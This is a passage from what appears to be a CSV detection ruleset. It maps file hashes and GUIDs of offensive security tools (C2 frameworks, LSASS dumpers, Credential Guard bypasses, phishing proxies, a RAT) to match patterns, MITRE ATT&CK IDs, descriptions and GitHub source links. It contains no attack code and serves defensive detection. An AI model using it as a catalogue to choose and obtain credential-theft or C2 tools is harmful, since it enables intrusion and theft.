TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*2a363206ab10c7d679055b32bbd73782aff91263f9325e179a2f03f6bca0f55a*",".{0,1000}2a363206ab10c7d679055b32bbd73782aff91263f9325e179a2f03f6bca0f55a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*2a46df8322062f52a20c78eb93d7b068b61037db2ce48edcb9f8beda43dd8ede*",".{0,1000}2a46df8322062f52a20c78eb93d7b068b61037db2ce48edcb9f8beda43dd8ede.{0,1000}","offensive_tool_keyword","BypassCredGuard","Credential Guard Bypass Via Patching Wdigest Memory","T1003 - T1112 - T1555.002 - T1574","TA0006 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/wh0amitz/BypassCredGuard","1","0","N/A","10","3","293","47","2023-02-03T06:55:43Z","2023-01-18T15:16:11Z" "*2a5afbf327864c6b682b15d893504d9e3757e83522ac32e848e69a5e496e1fce*",".{0,1000}2a5afbf327864c6b682b15d893504d9e3757e83522ac32e848e69a5e496e1fce.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*2a7c53ab30b10ad3b6c82d1f057a094ecd68975f7c81becd2ba1f9519e8cf340*",".{0,1000}2a7c53ab30b10ad3b6c82d1f057a094ecd68975f7c81becd2ba1f9519e8cf340.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*2a8b77cd55cc43d79d9c4475cc9287360f6fd3dc47a07f83ff33853de1652f7d*",".{0,1000}2a8b77cd55cc43d79d9c4475cc9287360f6fd3dc47a07f83ff33853de1652f7d.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*2a9cd5021cf8f43304a9ecc91759b534aad0efff59d9da57ca666c8b5f8ce819*",".{0,1000}2a9cd5021cf8f43304a9ecc91759b534aad0efff59d9da57ca666c8b5f8ce819.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "*2aa583cf99e14b810027715517aa588c0261a8df80fcb8018c29d2ff5d8777f3*",".{0,1000}2aa583cf99e14b810027715517aa588c0261a8df80fcb8018c29d2ff5d8777f3.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*2ab5af4a7fa7d14b4a4facef9b4d80bd3ada7e20c36712ece61ce9c294107745*",".{0,1000}2ab5af4a7fa7d14b4a4facef9b4d80bd3ada7e20c36712ece61ce9c294107745.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","1","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "*2AE886C3-3272-40BE-8D3C-EBAEDE9E61E1*",".{0,1000}2AE886C3\-3272\-40BE\-8D3C\-EBAEDE9E61E1.{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","0","N/A","N/A","10","1592","204","2023-11-24T19:22:31Z","2022-12-23T14:37:00Z" "*2afcf7aa79d17989aac2b1b3ecca95d2c30659a951d4626e4f0d0fc73e1093f3*",".{0,1000}2afcf7aa79d17989aac2b1b3ecca95d2c30659a951d4626e4f0d0fc73e1093f3.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*2b6e6ca400190f98d1bf00cc5d50c728364c75db258043fe26b5f014c19c7188*",".{0,1000}2b6e6ca400190f98d1bf00cc5d50c728364c75db258043fe26b5f014c19c7188.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "*2B914EE7-F206-4A83-B435-460D054315BB*",".{0,1000}2B914EE7\-F206\-4A83\-B435\-460D054315BB.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*2ba17d622736a4d3132c17db3b8c725f001fdbe7fca4b9b4248262b5e54a4107*",".{0,1000}2ba17d622736a4d3132c17db3b8c725f001fdbe7fca4b9b4248262b5e54a4107.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","9","4","N/A","N/A","N/A","N/A" "*2ba719023361de2ac1f7c68c9d4081860aa70eca707662e142f89048d7a89859*",".{0,1000}2ba719023361de2ac1f7c68c9d4081860aa70eca707662e142f89048d7a89859.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*2bd33a784af634af7590ad9dc43d574005dd95b2b2e20640b97cff0474af91c6*",".{0,1000}2bd33a784af634af7590ad9dc43d574005dd95b2b2e20640b97cff0474af91c6.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","file_hash","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*2bdfb1a641d40f9036e7f68adb158f4acd83a358af9a888e4e3e6ae757ea9b8d*",".{0,1000}2bdfb1a641d40f9036e7f68adb158f4acd83a358af9a888e4e3e6ae757ea9b8d.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*2C059FE7-C868-4C6D-AFA0-D62BA3C1B2E1*",".{0,1000}2C059FE7\-C868\-4C6D\-AFA0\-D62BA3C1B2E1.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*2c08ea21df4710665340d0e5c3166db390dbc1edeb5ea9cd00f3d80c2523ac07*",".{0,1000}2c08ea21df4710665340d0e5c3166db390dbc1edeb5ea9cd00f3d80c2523ac07.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*2c46b513f01db94c79b9bf4a15b2965c38bbdd8272ad7e10266f5e04a67f16d0*",".{0,1000}2c46b513f01db94c79b9bf4a15b2965c38bbdd8272ad7e10266f5e04a67f16d0.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*2c4c004c2c1a3864c15b74aacb0c9ecf069aa673c59194fd18667aeace3a07fd*",".{0,1000}2c4c004c2c1a3864c15b74aacb0c9ecf069aa673c59194fd18667aeace3a07fd.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*2C6D323A-B51F-47CB-AD37-972FD051D475*",".{0,1000}2C6D323A\-B51F\-47CB\-AD37\-972FD051D475.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","0","N/A","10","5","401","49","2024-04-17T08:06:17Z","2024-02-02T05:56:29Z" "*2c9ffb6711e510c8087c1095324e7ceef0187de6526b13aff5ab1e775f5ed676*",".{0,1000}2c9ffb6711e510c8087c1095324e7ceef0187de6526b13aff5ab1e775f5ed676.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*2cd529d03729e9f59323391f57762c0952c6bd800ef46fd58855775bad7e7acc*",".{0,1000}2cd529d03729e9f59323391f57762c0952c6bd800ef46fd58855775bad7e7acc.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*2ce6ab2d48d613830f2cd7920ced86ca7b6782dbafe64af84ba476f71d08620e*",".{0,1000}2ce6ab2d48d613830f2cd7920ced86ca7b6782dbafe64af84ba476f71d08620e.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*2CFB9E9E-479D-4E23-9A8E-18C92E06B731*",".{0,1000}2CFB9E9E\-479D\-4E23\-9A8E\-18C92E06B731.{0,1000}","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","0","N/A","9","3","283","44","2023-08-20T07:12:01Z","2023-07-30T09:25:38Z" "*2d00a5df9000f49c0b42ca0fe316103af9cc3bdf11bea4da5255690193d3ef21*",".{0,1000}2d00a5df9000f49c0b42ca0fe316103af9cc3bdf11bea4da5255690193d3ef21.{0,1000}","offensive_tool_keyword","rattler","Automated DLL Enumerator","T1174 - T1574.007","TA0005","N/A","N/A","Discovery","https://github.com/sensepost/rattler","1","0","N/A","9","6","516","135","2017-12-21T18:01:09Z","2016-11-28T12:35:44Z" "*2d320664154077c143296da336e7ac4bcc3f639cee91734ec0e4689b782d17eb*",".{0,1000}2d320664154077c143296da336e7ac4bcc3f639cee91734ec0e4689b782d17eb.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*2d3ce0b49997314a863aa4a9ef25fe06021aac1107aaf63af18ba9730f13e7e3*",".{0,1000}2d3ce0b49997314a863aa4a9ef25fe06021aac1107aaf63af18ba9730f13e7e3.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*2d6283f2487ebd6093546fc46eac56e5ce592c9ad5bfa70ee785ac0192a71d03*",".{0,1000}2d6283f2487ebd6093546fc46eac56e5ce592c9ad5bfa70ee785ac0192a71d03.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*2D863D7A-A369-419C-B4B3-54BDB88B5816*",".{0,1000}2D863D7A\-A369\-419C\-B4B3\-54BDB88B5816.{0,1000}","offensive_tool_keyword","UsoDllLoader","This PoC shows a technique that can be used to weaponize privileged file write vulnerabilities on Windows. It provides an alternative to the DiagHub DLL loading exploit ","T1210.001 - T1055 - T1574.001","TA0007 - TA0002 - TA0001","N/A","N/A","Exploitation tools","https://github.com/itm4n/UsoDllLoader","1","0","N/A","N/A","4","371","104","2020-06-06T11:05:12Z","2019-08-01T17:58:16Z" "*2da209fc877acf2adcbd7339bb759f38509ce4601bd8ed750648bf75cbed0e97*",".{0,1000}2da209fc877acf2adcbd7339bb759f38509ce4601bd8ed750648bf75cbed0e97.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*2df9eb9a967a029221346b322e7861e6db914770fadb7e99fe98d4a37764d441*",".{0,1000}2df9eb9a967a029221346b322e7861e6db914770fadb7e99fe98d4a37764d441.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*2e0515d20feeb3a1d5f368c85eaad188eb96d4beec0b38502413f5f7086e5857*",".{0,1000}2e0515d20feeb3a1d5f368c85eaad188eb96d4beec0b38502413f5f7086e5857.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*2e10ef23421a10e19aa4d8093f3a283e7e3e638e16689b329850e262390192c3*",".{0,1000}2e10ef23421a10e19aa4d8093f3a283e7e3e638e16689b329850e262390192c3.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*2e321800803ff287f2c44203c718fa4a7a97dda864f1c2761e7720a57b18bd97*",".{0,1000}2e321800803ff287f2c44203c718fa4a7a97dda864f1c2761e7720a57b18bd97.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*2E37A3D2DC2ECB0BD026C93055A71CAB4E568B062B1C9F7B8846E04DF1E9F3E6*",".{0,1000}2E37A3D2DC2ECB0BD026C93055A71CAB4E568B062B1C9F7B8846E04DF1E9F3E6.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","9","7","656","120","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z" "*2e5237ac119b03045080bb330d818526fd76971f28d3ad932277ec529d9aa525*",".{0,1000}2e5237ac119b03045080bb330d818526fd76971f28d3ad932277ec529d9aa525.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*2e54d374300b86e3eaee278745f26cd074023ca2ebfa575f5060032192a1232c*",".{0,1000}2e54d374300b86e3eaee278745f26cd074023ca2ebfa575f5060032192a1232c.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*2e6a0588c2e9136520122b97ebe2463a37f15ac537121d22873467b275ceb630*",".{0,1000}2e6a0588c2e9136520122b97ebe2463a37f15ac537121d22873467b275ceb630.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*2e7b0f4d6b446760a2899fcc2e854850014b3ce0826291913d3d3c160ed06191*",".{0,1000}2e7b0f4d6b446760a2899fcc2e854850014b3ce0826291913d3d3c160ed06191.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z" "*2e7c3414d7bdcd4d36e50ac91be10d6025972c8f1e5e79cb0186c1d2b7c3e94f*",".{0,1000}2e7c3414d7bdcd4d36e50ac91be10d6025972c8f1e5e79cb0186c1d2b7c3e94f.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*2e805512f5ed6105f23c5b3295fa9ffb087ec05ea3d46e1f046ca66d4be09076*",".{0,1000}2e805512f5ed6105f23c5b3295fa9ffb087ec05ea3d46e1f046ca66d4be09076.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*2e8d79c2cc6104f5c4a27104b0de6d09f5d204d56c81f389bdd9ca8e35cce298*",".{0,1000}2e8d79c2cc6104f5c4a27104b0de6d09f5d204d56c81f389bdd9ca8e35cce298.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*2ecb363e5ff0d146859bb93372e5e00f4fd6fd265bdbe7b5dd36f2716199cc1c*",".{0,1000}2ecb363e5ff0d146859bb93372e5e00f4fd6fd265bdbe7b5dd36f2716199cc1c.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - 